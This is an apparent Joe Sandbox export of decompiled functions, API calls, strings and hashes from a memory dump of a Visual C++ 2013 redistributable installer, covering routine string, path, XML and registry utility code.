Opcode ID: 56080988953a3a9d3403077beaf92078e299a822c5bd264138891605007f9e9c
Instruction ID: ffb09bfe25d2dc7330b97b6c6d05fd589ec5e45b0773091bd160b715304038ca
Opcode Fuzzy Hash: 56080988953a3a9d3403077beaf92078e299a822c5bd264138891605007f9e9c
Instruction Fuzzy Hash: D6317331D1025ADBDF228F19CD807EDBBB4EF48381F1080EAA648EA150D6B59AC48F50

Uniqueness

Uniqueness Score: -1.00%

Function 012B125F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B125F(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t24;
				signed int _t30;
				signed int _t32;
				signed int _t35;
				char _t37;
				unsigned int _t49;
				intOrPtr* _t51;

				_v8 = _v8 & 0x00000000;
				_t51 = _a4;
				_t23 =  *_t51;
				_t47 = 0;
				_v12 = _v12 & 0;
				if( *_t51 == 0) {
					L4:
					_t37 = _a12;
					if(_t37 != 0) {
						L7:
						_t24 = _v12;
						_t15 = _t37 + 1; // 0x12b1a67
						if(_t47 - _t24 >= _t15) {
							L9:
							_t25 =  *_t51;
							if( *_t51 == 0) {
								_v8 = 0x8000ffff;
							} else {
								E012A8310(_t25 + _t37 + _t37, _t25, _t47 + _t47 - _t37 + _t37);
								E012A7EC0( *_t51, _a8, _t39);
							}
							L12:
							L13:
							return _v8;
						}
						_t47 = _t24 + _t37 + 1;
						_t30 = E012B00D8(_t51, _t24 + _t37 + 1);
						_v8 = _t30;
						if(_t30 < 0) {
							goto L12;
						}
						goto L9;
					}
					_t32 = E01291CA7(_a8, 0x7fffffff,  &_a12);
					_v8 = _t32;
					if(_t32 < 0) {
						goto L12;
					}
					_t37 = _a12;
					goto L7;
				}
				_t49 = E012B2382(_t23);
				if(_t49 != 0xffffffff) {
					_t47 = _t49 >> 1;
					_t35 = E01291CA7( *_t51, 0x7fffffff,  &_v12);
					_v8 = _t35;
					if(_t35 < 0) {
						goto L13;
					}
					goto L4;
				}
				_v8 = 0x80070057;
				goto L13;
			}

0x012b1264
0x012b1269
0x012b126c
0x012b126f
0x012b1271
0x012b1276
0x012b12aa
0x012b12ab
0x012b12b0
0x012b12cd
0x012b12cd
0x012b12d4
0x012b12d9
0x012b12ed
0x012b12ed
0x012b12f1
0x012b1314
0x012b12f3
0x012b12ff
0x012b130a
0x012b130f
0x012b131b
0x012b131c
0x012b1322
0x012b1322
0x012b12db
0x012b12e1
0x012b12e6
0x012b12eb
0x00000000
0x00000000
0x00000000
0x012b12eb
0x012b12be
0x012b12c3
0x012b12c8
0x00000000
0x00000000
0x012b12ca
0x00000000
0x012b12ca
0x012b127e
0x012b1283
0x012b129c
0x012b129e
0x012b12a3
0x012b12a8
0x00000000
0x00000000
0x00000000
0x012b12a8
0x012b1285
0x00000000

APIs

_memmove.LIBCMT ref: 012B12FF
_memmove.LIBCMT ref: 012B130A

Part of subcall function 012B2382: GetProcessHeap.KERNEL32(00000000,?,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000), ref: 012B238A
Part of subcall function 012B2382: HeapSize.KERNEL32(00000000,?,012B08DD,?,?,00000000,?,?,?,?,012AF6D3,?,00000340,00000000,00000000,?), ref: 012B2391

Strings

W, xrefs: 012B1285

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap_memmove$ProcessSize
String ID: W
API String ID: 3606272560-655174618
Opcode ID: 4337d811ab13aa5c2fe4b0058768c62c44b60dd9dc8479738dd8d0c6da4f175d
Instruction ID: 9f5472c3908edfc100587fdaecd77a66a03e23c5a444a5193ec0ad2dc580baf6
Opcode Fuzzy Hash: 4337d811ab13aa5c2fe4b0058768c62c44b60dd9dc8479738dd8d0c6da4f175d
Instruction Fuzzy Hash: 6B21B671A21207EBDF01DF69DCD0DEE77B9EF543A4B104629EA11D7144E731EA608760

Uniqueness

Uniqueness Score: -1.00%

Function 012B19CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E012B19CF(signed short** _a4) {
				signed short** _t11;
				signed short** _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				void* _t26;
				signed short* _t27;

				_t17 = _a4;
				_t27 =  *_t17;
				_t11 = 0;
				_a4 = 0;
				_t18 =  *_t27 & 0x0000ffff;
				_t21 = 0x61;
				_t20 = 0x5c;
				if(_t21 > _t18) {
					L2:
					_t22 = 0x41;
					if(_t22 <= _t18) {
						_t24 = 0x5a;
						if(_t24 >= _t18) {
							goto L4;
						}
					}
				} else {
					_t26 = 0x7a;
					if(_t26 >= _t18) {
						L4:
						_t25 = 0x3a;
						if(_t25 == _t27[1] && _t20 == _t27[2]) {
							_push(4);
							_push(L"\\\\?\\");
							L13:
							_push(_t17);
							return E012B125F(_t18);
						}
					} else {
						goto L2;
					}
				}
				if(_t20 != _t18) {
					L14:
					return 0x80070057;
				}
				_t5 =  &(_t27[1]); // 0x2
				_t23 = _t5;
				if(_t20 !=  *_t5) {
					goto L14;
				}
				_t19 = 0x3f;
				if(_t19 != _t27[2] || _t20 != _t27[3]) {
					_t11 = E012B01C4(_t27,  &_a4);
					if(_t11 >= 0) {
						_t10 = _a4 - 2; // 0x12b1d25
						_t18 = _t10;
						E012B8748(_t27, _a4, _t23, _t10);
						_push(7);
						_push(L"\\\\?\\UNC");
						goto L13;
					}
				}
				return _t11;
			}

0x012b19d3
0x012b19d7
0x012b19da
0x012b19de
0x012b19e1
0x012b19e4
0x012b19e7
0x012b19eb
0x012b19f5
0x012b19f7
0x012b19fb
0x012b19ff
0x012b1a03
0x00000000
0x00000000
0x012b1a03
0x012b19ed
0x012b19ef
0x012b19f3
0x012b1a05
0x012b1a07
0x012b1a0c
0x012b1a14
0x012b1a16
0x012b1a60
0x012b1a60
0x00000000
0x012b1a61
0x00000000
0x00000000
0x00000000
0x012b19f3
0x012b1a20
0x012b1a68
0x00000000
0x012b1a68
0x012b1a22
0x012b1a22
0x012b1a28
0x00000000
0x00000000
0x012b1a2c
0x012b1a31
0x012b1a3e
0x012b1a45
0x012b1a4a
0x012b1a4a
0x012b1a51
0x012b1a59
0x012b1a5b
0x00000000
0x012b1a5b
0x012b1a45
0x012b1a71

APIs

_memmove_s.LIBCMT ref: 012B1A51

Strings

\\?\UNC, xrefs: 012B1A5B
\\?\, xrefs: 012B1A16

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memmove_s
String ID: \\?\$\\?\UNC
API String ID: 800865076-2523517826
Opcode ID: b9ae503376390a8776d00d62604eaae523b220d8a37143658571bcd8b0ac5e85
Instruction ID: 464689610c75ab57cf38e170a11cf5ab4efa6d50e8daf27be3739a68286808df
Opcode Fuzzy Hash: b9ae503376390a8776d00d62604eaae523b220d8a37143658571bcd8b0ac5e85
Instruction Fuzzy Hash: 8411C862360202B5E7319608ECD5EF777DDEB51FE0F804026F7489A182E2A1B2E1C765

Uniqueness

Uniqueness Score: -1.00%

Function 012840BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E012840BB(void* __ecx, void* __edx, int _a4, short* _a8, intOrPtr _a12) {
				int _v8;
				int _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				short** _t36;

				_t31 = __edx;
				_push(__ecx);
				_t19 = _a4;
				_t28 =  *((intOrPtr*)(_t19 + 0x8c));
				_t36 = 0;
				_t33 = 0;
				_v8 = 0x80070490;
				if(_t28 != 2) {
					if(_t28 == 3) {
						_t36 =  *(_t19 + 0x9c);
						_t33 =  *((intOrPtr*)(_t19 + 0xa0));
					}
				} else {
					_t36 =  *(_t19 + 0xb4);
					_t33 =  *((intOrPtr*)(_t19 + 0xb8));
				}
				_a4 = 0;
				if(_t33 <= 0) {
					L12:
					return _v8;
				} else {
					while(CompareStringW(0, 0,  *_t36, 0xffffffff, _a8, 0xffffffff) != 2) {
						_a4 = _a4 + 1;
						_t36 =  &(_t36[3]);
						if(_a4 < _t33) {
							continue;
						}
						goto L12;
					}
					if(_a12 == 0) {
						L11:
						_v8 = 0;
						goto L12;
					}
					_t22 = E012B1171(_t28, _t31, _a12, _t36[1], 0);
					_v8 = _t22;
					if(_t22 >= 0) {
						goto L11;
					}
					_push("Failed to copy the property value.");
					_push(_t22);
					E012AFA86();
					goto L12;
				}
			}

0x012840bb
0x012840be
0x012840bf
0x012840c2
0x012840cd
0x012840cf
0x012840d1
0x012840db
0x012840ee
0x012840f0
0x012840f6
0x012840f6
0x012840dd
0x012840dd
0x012840e3
0x012840e3
0x012840fc
0x01284101
0x01284150
0x01284157
0x01284103
0x01284103
0x01284119
0x0128411c
0x01284122
0x00000000
0x00000000
0x00000000
0x01284124
0x01284129
0x0128414d
0x0128414d
0x00000000
0x0128414d
0x01284132
0x01284137
0x0128413c
0x00000000
0x00000000
0x0128413e
0x01284143
0x01284144
0x00000000
0x0128414a

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,?,0129F8DA,00000000,IGNOREDEPENDENCIES,00000000,?), ref: 0128410E

Strings

Failed to copy the property value., xrefs: 0128413E
IGNOREDEPENDENCIES, xrefs: 012840CA

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: ecaa4b209fea9981107bed4ad5270eb6a3739cb5ebac9e088235c68f5616e758
Instruction ID: eb250a76e079ce5f9c44d21bf5347670edae5b9840d02d372e847247ac0c3a82
Opcode Fuzzy Hash: ecaa4b209fea9981107bed4ad5270eb6a3739cb5ebac9e088235c68f5616e758
Instruction Fuzzy Hash: A111C43162525AEFCF10AF94CC85EAE7B65FF14364F21857AEA29A72D1C7305940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01291BBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01291BBB(void* __ebx, void* __ecx, signed int* __esi) {
				void* _v8;
				void* _v12;
				void* __edi;
				signed short* _t12;
				signed int _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				signed int* _t25;

				_t25 = __esi;
				_v12 = 0;
				_v8 = 0;
				_t12 = E012B378B(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", 0x20019,  &_v12);
				if(_t12 >= 0) {
					_t12 = E012B31D0(__ebx, 0, __esi, _v12, L"Logging",  &_v8);
					if(_t12 >= 0) {
						_t12 = _v8;
						while( *_t12 != 0) {
							_t17 =  *_t12 & 0x0000ffff;
							_t18 = 0x76;
							if(_t18 == _t17) {
								L8:
								 *_t25 =  *_t25 | 0x00000002;
							} else {
								_t19 = 0x56;
								if(_t19 == _t17) {
									goto L8;
								} else {
									_t20 = 0x78;
									if(_t20 == _t17) {
										L7:
										 *_t25 =  *_t25 | 0x00000004;
									} else {
										_t21 = 0x58;
										if(_t21 == _t17) {
											goto L7;
										}
									}
								}
							}
							_t12 =  &(_t12[1]);
						}
					}
				}
				if(_v8 != 0) {
					_t12 = E012B01E8(_v8);
				}
				if(_v12 != 0) {
					return RegCloseKey(_v12);
				}
				return _t12;
			}

0x01291bbb
0x01291bd6
0x01291bd9
0x01291bdc
0x01291be3
0x01291bf1
0x01291bf8
0x01291bfa
0x01291c2d
0x01291bff
0x01291c04
0x01291c08
0x01291c27
0x01291c27
0x01291c0a
0x01291c0c
0x01291c10
0x00000000
0x01291c12
0x01291c14
0x01291c18
0x01291c22
0x01291c22
0x01291c1a
0x01291c1c
0x01291c20
0x00000000
0x00000000
0x01291c20
0x01291c18
0x01291c10
0x01291c2a
0x01291c2a
0x01291c2d
0x01291bf8
0x01291c35
0x01291c3a
0x01291c3a
0x01291c43
0x00000000
0x01291c48
0x01291c4f

APIs

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

RegCloseKey.ADVAPI32(?,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001,?,?,?,01291F19,00000000,?,?,?), ref: 01291C48

Part of subcall function 012B31D0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,01291F19,00000000,01291F19,00000002,00000009,00000000,01291F19,00000000,?,?,?), ref: 012B3241
Part of subcall function 012B31D0: RegQueryValueExW.KERNELBASE(?,01291F19,00000000,?,01291F19,?,01291F19,?), ref: 012B327A

Strings

Logging, xrefs: 01291BE9
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 01291BCA

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
API String ID: 1586453840-387823766
Opcode ID: 85ae34fdd3fa7c9f8866bca25987049efd5d3d70e8d1d482e133e869457dd5dc
Instruction ID: 4333f36113194c3a48324815932ecdaa5dfda33f24a0f8e3b6147db18ef6b7b2
Opcode Fuzzy Hash: 85ae34fdd3fa7c9f8866bca25987049efd5d3d70e8d1d482e133e869457dd5dc
Instruction Fuzzy Hash: A3110C71A6024BBBEF349B4ADE429BEBF79FB50B60F504455E34066050E2719791D702

Uniqueness

Uniqueness Score: -1.00%

Function 012B16F5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B16F5(short** __eax, void* __ecx, void* __edx, intOrPtr _a4, int _a8, int _a12) {
				signed int _t12;
				signed int _t19;
				short** _t20;

				_t20 = __eax;
				_t19 = E012B1171(__ecx, __edx, __eax, _a4, _a8);
				if(_t19 < 0) {
					L9:
					return _t19;
				}
				if(_a8 != 0) {
					L3:
					if(LCMapStringW(0x7f, _a12,  *_t20, _a8,  *_t20, _a8) == 0) {
						_t12 = GetLastError();
						if(_t12 > 0) {
							_t12 = _t12 & 0x0000ffff | 0x80070000;
						}
						_t19 = _t12;
						if(_t19 >= 0) {
							_t19 = 0x80004005;
						}
						E012B294E(_t12, "strutil.cpp", 0x97f, _t19);
					}
					goto L9;
				}
				_t19 = E01291CA7( *_t20, 0x7fffffff,  &_a8);
				if(_t19 < 0) {
					goto L9;
				}
				goto L3;
			}

0x012b16fd
0x012b1708
0x012b170c
0x012b1772
0x012b1777
0x012b1777
0x012b1712
0x012b172a
0x012b1741
0x012b1743
0x012b174b
0x012b1752
0x012b1752
0x012b1757
0x012b175b
0x012b175d
0x012b175d
0x012b176d
0x012b176d
0x00000000
0x012b1741
0x012b1724
0x012b1728
0x00000000
0x00000000
0x00000000

APIs

LCMapStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,012B17A4,00000000,?,00000200), ref: 012B1739
GetLastError.KERNEL32(?,012B17A4,00000000,?,00000200,?,012B6E3E,00000000,00000000,00000000,00000000,?,00000000,?,012B721A,00000000), ref: 012B1743

Strings

strutil.cpp, xrefs: 012B1768

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 500c2a4becadbebba4cc15a827041da19c9de44437dfbc96fbe96869667f72f7
Instruction ID: d13d7373d83ef25854e4495f322ce213629301cbfb0f563973d54c1a7cc2dd54
Opcode Fuzzy Hash: 500c2a4becadbebba4cc15a827041da19c9de44437dfbc96fbe96869667f72f7
Instruction Fuzzy Hash: 0601D836260107BBDB210E559C54EEB3F59DF817F0F144028FE688B150DB36D420A750

Uniqueness

Uniqueness Score: -1.00%

Function 012B4F9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E012B4F9E(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				void* _t8;
				void* _t12;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				intOrPtr _t17;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a12 != 0) {
						_t6 = _a8;
						if(_t6 == 0) {
							_t6 = 0x12ba5c8;
						}
						__imp__#2(_t6, _t16);
						_t17 = _t6;
						if(_t17 != 0) {
							_t8 =  *((intOrPtr*)( *_t14 + 0x90))(_t14, _t17, _a12);
							_t15 = _t8;
							__imp__#6(_t17);
						} else {
							_t15 = 0x8007000e;
							E012B294E(0x8007000e, "xmlutil.cpp", 0x41a, 0x8007000e);
						}
					} else {
						_t12 = 0x8000ffff;
						_push(0x8000ffff);
						_push(0x417);
						goto L2;
					}
				} else {
					_t12 = 0x8000ffff;
					_push(0x8000ffff);
					_push(0x416);
					L2:
					_push("xmlutil.cpp");
					_t15 = _t12;
					E012B294E(_t12);
				}
				return _t15;
			}

0x012b4fa2
0x012b4fa7
0x012b4fc6
0x012b4fd5
0x012b4fda
0x012b4fdc
0x012b4fdc
0x012b4fe3
0x012b4fe9
0x012b4fed
0x012b500f
0x012b5016
0x012b5018
0x012b4fef
0x012b4fff
0x012b5001
0x012b5001
0x012b4fc8
0x012b4fc8
0x012b4fcd
0x012b4fce
0x00000000
0x012b4fce
0x012b4fa9
0x012b4fa9
0x012b4fae
0x012b4faf
0x012b4fb4
0x012b4fb4
0x012b4fb9
0x012b4fbb
0x012b4fbb
0x012b5023

APIs

SysAllocString.OLEAUT32(?), ref: 012B4FE3
SysFreeString.OLEAUT32(00000000), ref: 012B5018

Strings

xmlutil.cpp, xrefs: 012B4FB4, 012B4FFA

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 729131d06ab2e0f126e6b5a2e782a528a5e9e1908fda857e8c442fde34ba2903
Instruction ID: 8ecc8393c5cec7bbab34546e3aec87a0b422509c93ad2ee8727fc3fc055c5c86
Opcode Fuzzy Hash: 729131d06ab2e0f126e6b5a2e782a528a5e9e1908fda857e8c442fde34ba2903
Instruction Fuzzy Hash: 3B01263167034AABDB215A298CC8FFA369CAF467F0F140035FA05DB702DAB0C91083A1

Uniqueness

Uniqueness Score: -1.00%

Function 012B4EA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E012B4EA7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				void* _t8;
				void* _t12;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				intOrPtr _t17;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a12 != 0) {
						_t6 = _a8;
						if(_t6 == 0) {
							_t6 = 0x12ba5c8;
						}
						__imp__#2(_t6, _t16);
						_t17 = _t6;
						if(_t17 != 0) {
							_t8 =  *((intOrPtr*)( *_t14 + 0x94))(_t14, _t17, _a12);
							_t15 = _t8;
							__imp__#6(_t17);
						} else {
							_t15 = 0x8007000e;
							E012B294E(0x8007000e, "xmlutil.cpp", 0x22e, 0x8007000e);
						}
					} else {
						_t12 = 0x8000ffff;
						_push(0x8000ffff);
						_push(0x22b);
						goto L2;
					}
				} else {
					_t12 = 0x8000ffff;
					_push(0x8000ffff);
					_push(0x22a);
					L2:
					_push("xmlutil.cpp");
					_t15 = _t12;
					E012B294E(_t12);
				}
				return _t15;
			}

0x012b4eab
0x012b4eb0
0x012b4ecf
0x012b4ede
0x012b4ee3
0x012b4ee5
0x012b4ee5
0x012b4eec
0x012b4ef2
0x012b4ef6
0x012b4f18
0x012b4f1f
0x012b4f21
0x012b4ef8
0x012b4f08
0x012b4f0a
0x012b4f0a
0x012b4ed1
0x012b4ed1
0x012b4ed6
0x012b4ed7
0x00000000
0x012b4ed7
0x012b4eb2
0x012b4eb2
0x012b4eb7
0x012b4eb8
0x012b4ebd
0x012b4ebd
0x012b4ec2
0x012b4ec4
0x012b4ec4
0x012b4f2c

APIs

SysAllocString.OLEAUT32(?), ref: 012B4EEC
SysFreeString.OLEAUT32(00000000), ref: 012B4F21

Strings

xmlutil.cpp, xrefs: 012B4EBD, 012B4F03

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: c377801b7fff8547e5b25ada8e2be2c3c7174dd9347b78971ca51d6d4e277c29
Instruction ID: e49f947ea3ec42445f9d7280d830af77f9ab2c53524f0e831e943481d3539805
Opcode Fuzzy Hash: c377801b7fff8547e5b25ada8e2be2c3c7174dd9347b78971ca51d6d4e277c29
Instruction Fuzzy Hash: 7D01F231664346B7DB216A699CCCEF636D8EF467E1F140125FD06DB742D6B0C9018290

Uniqueness

Uniqueness Score: -1.00%

Function 012B1A74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B1A74(WCHAR** _a4, struct HINSTANCE__* _a8) {
				long _t6;
				signed int _t7;
				long _t10;
				WCHAR** _t11;
				signed int _t12;

				_t11 = _a4;
				_t10 = 0x104;
				while(1) {
					_t12 = E012B00D8(_t11, _t10);
					if(_t12 < 0) {
						break;
					}
					_t6 = GetModuleFileNameW(_a8,  *_t11, _t10);
					if(_t6 == 0) {
						_t7 = GetLastError();
						if(_t7 > 0) {
							_t7 = _t7 & 0x0000ffff | 0x80070000;
						}
						_t12 = _t7;
						if(_t12 >= 0) {
							_t12 = 0x80004005;
						}
						E012B294E(_t7, "pathutil.cpp", 0x1bb, _t12);
					} else {
						if(_t6 != _t10) {
							_t12 = 0;
						} else {
							_t3 = _t6 + 1; // 0x1
							_t10 = _t3;
							continue;
						}
					}
					break;
				}
				return _t12;
			}

0x012b1a7a
0x012b1a7d
0x012b1a82
0x012b1a89
0x012b1a8d
0x00000000
0x00000000
0x012b1a95
0x012b1a9d
0x012b1aac
0x012b1ab4
0x012b1abb
0x012b1abb
0x012b1ac0
0x012b1ac4
0x012b1ac6
0x012b1ac6
0x012b1ad6
0x012b1a9f
0x012b1aa1
0x012b1aa8
0x012b1aa3
0x012b1aa3
0x012b1aa3
0x00000000
0x012b1aa3
0x012b1aa1
0x00000000
0x012b1a9d
0x012b1ae1

APIs

GetModuleFileNameW.KERNEL32(01282136,?,00000104,?,00000104,?,00000000,?,?,01282136,?,00000000,?,?,?,773D9EB0), ref: 012B1A95
GetLastError.KERNEL32(?,01282136,?,00000000,?,?,?,773D9EB0,?,00000000), ref: 012B1AAC

Strings

pathutil.cpp, xrefs: 012B1AD1

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: c3061d803e399c7b99f6ef07189332552b53cb99154de2c6a8d12c35e1352ca4
Instruction ID: b6b129710f2110607168aedd2dd4cd2b92fd39efa71984a69925add4290f3320
Opcode Fuzzy Hash: c3061d803e399c7b99f6ef07189332552b53cb99154de2c6a8d12c35e1352ca4
Instruction Fuzzy Hash: 28F0C232A606266B97315659BCE8EBABAECDF01BF0B154525FE04E7150D755EC2083E0

Uniqueness

Uniqueness Score: -1.00%

Function 01287196 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E01287196(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				void* _t21;
				void* _t23;

				_t21 = __edx;
				_t18 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t26 = _a4;
				_t23 = E012B378B( *((intOrPtr*)(_a4 + 0x4c)),  *((intOrPtr*)(_t26 + 0x50)), 0x20006,  &_v8);
				if(_t23 >= 0) {
					_t23 = E01286893(1, _t18, _t21, _t26, _v8, 0);
					if(_t23 < 0) {
						_push("Failed to update resume mode.");
						goto L4;
					}
				} else {
					_push("Failed to open registration key.");
					L4:
					_push(_t23);
					E012AFA86();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t23;
			}

0x01287196
0x01287196
0x01287199
0x0128719a
0x0128719f
0x012871b7
0x012871bb
0x012871d1
0x012871d5
0x012871d7
0x00000000
0x012871d7
0x012871bd
0x012871bd
0x012871dc
0x012871dc
0x012871dd
0x012871e3
0x012871e8
0x012871ed
0x012871ed
0x012871f8

APIs

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,?,00020006,00000000,00000000,00000001,?,?,012A1835,000000F9,00000000,000000B9,00000000), ref: 012871ED

Strings

